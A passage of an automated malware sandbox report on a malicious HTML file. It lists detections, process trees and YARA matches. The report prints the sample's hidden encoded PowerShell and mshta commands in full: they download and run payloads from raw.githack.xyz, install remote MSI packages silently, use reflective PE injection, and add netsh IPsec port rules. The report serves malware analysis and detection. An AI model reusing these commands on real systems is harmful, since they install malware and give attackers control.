AZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4488, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', Proces

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: 1.htmAvira: detected
Antivirus detection for URL or domainShow sources
Source: https://raw.githack.xyz/PCWGZVOA3.jpgAvira URL Cloud: Label: malware

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\mshta.exeJump to behavior

Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownDNS traffic detected: queries for: raw.githack.xyz
Source: PowerShell_transcript.849224.m82e68Kx.20200527135527.txt.7.drString found in binary or memory: https://raw.githack.xyz/3DHRBFPLZTEQRRBUB.jpg
Source: PowerShell_transcript.849224.EAkoss5+.20200527135524.txt.5.drString found in binary or memory: https://raw.githack.xyz/PCWGZVOA3.jpg
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943

System Summary:

barindex
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2158
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2158Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\PeerDistRepub
Source: pyyender.dll.8.drStatic PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: 00000004.00000002.1079073084.0000000000968000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.1076570018.0000000000962000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.1080173137.0000000000F40000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.1079147056.000000000099E000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.1076272438.000000000098B000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.1078221528.000000000099D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.1078145233.0000000000965000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.1079063849.0000000000963000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.1078977410.0000000000930000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.1078161375.000000000098B000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: mshta.exe PID: 5836, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20200527\PowerShell_transcript.849224.EAkoss5+.20200527135524.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20200527\PowerShell_transcript.849224.m82e68Kx.20200527135527.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engineClassification label: mal88.evad.winHTM@76/38@2/1
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EFC2BDD0-A010-11EA-AAE6-9CC1A2A860C6}.datJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:700:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ifqGpTzdTzhMJSOz
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4892:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1692:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF65692C23B5947072.TMPJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [iO.compReSSIOn.cOmpResSiOnmOde]::DECoMPRESs )) , [SYSTem.TeXT.eNCOding]::AsCiI) ).ReAdtOEnd( )$MutualExclusiveName = 'Global\ifqGpTzdTzhMJSOz'$MutualSuccessfulornot = $flase$Mutex = New-Object System.Threading.Mutex ($true,$MutualExclusiveName,[ref]$MutualSuccessfulornot)$Regkeypath = "HKCU:\Software\7-Zip"$MsiCommand = {$Regkeypath = "HKCU:\Software\7-Zip"Add-Type -TypeDefinition @"using System;using System.Diagnostics;using System.Runtime.InteropServices;public static class msi{[DllImport("msi.dll", CharSet=CharSet.Auto)]public static extern int MsiInstallProduct(string packagePath, string commandLine);[DllImport("msi.dll")]public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd);}"@do{$msipathB = 'https://raw.githack.xyz/3DHRBFPLZTEQRRBUB.jpg';$msipathA = 'https://raw.githack.xyz/3DHRBFPLZTEQRRBUB.jpg';$msipathALL = @("$msipathB","$msipathA")$msipath = get-random $msipathALL;[msi]::MsiSetInternalUI(2,0);[msi]::MsiInstallProduct("$msipath","")Start-Sleep 60}until (Get-ItemProperty -Path $Regkeypath -name StayOnTop)}.ToString()$EncodedMsiCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($MsiCommand))$PowerEncodedMsiCommand = 'powershell.exe -nop -exec bypass -EncodedCommand '$PowerEncodedMsiCommandEasy = 'msiexec /i https://raw.githack.xyz/1DHRBFPLZTEQRRBUB.jpg /q'$PE = 'IEX(New-Object Net.WebClient).DownloadString(''https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/pe.jpg'');'$1905864 = 'Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1905864.jpg'$1808132 = 'Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808132.jpg'$1808164 = 'Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808164.jpg'$1505132 = 'Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505132.jpg'$1505164 = 'Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/OrYLH/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505164.jpg'$LpeCommandA = ' -ExeArgs ''"'$LpeCommandB = '"'' -ForceA;'$32 = $env:windir + "\system32\WindowsPowerShell\v1.0\powershell"$64 = $env:windir + "\sysnative\WindowsPowerShell\v1.0\powershell"if ($MutualSuccessfulornot){$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)){iex ($PowerEncodedMsiCommand+$EncodedMsiCommand)}else{if (!(Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){$CommandLast = ';Start-Sleep 60;'$CommandEncoded1 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($PE+$1505132+$LpeCommandA+$PowerEncodedMsiCommand+$EncodedMsiCommand+$LpeCommandB))$CommandEncoded2 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($PE+$180
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3144 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta vbscript:createobject('wscript.shell').run('PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA',0)(window.close)
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwAzAEQASABSAEIARgBQAEwAWgBUAEUAUQBSAFIAQgBVAEIALgBqAHAAZwAnADsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMwBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEIAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAG0AcwBpAHAAYQB0AGgAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAG0AcwBpAHAAYQB0AGgAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAA==
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9817.tmp' 'c:\Users\user\AppData\Local\Temp\pyyender\CSC56C194C6654CA9A4EBAB4D48E4014.TMP'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AF1A1FF3D2248D0BAB7E0A25E8DB57FB
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8CF3219BCC27917BD64CC43183B26878 E Global\MSI0000
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3144 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta vbscript:createobject('wscript.shell').run('PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA',0)(window.close)Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoAJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwAzAEQASABSAEIARgBQAEwAWgBUAEUAUQBSAFIAQgBVAEIALgBqAHAAZwAnADsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMwBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEIAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAG0AcwBpAHAAYQB0AGgAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAG0AcwBpAHAAYQB0AGgAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAA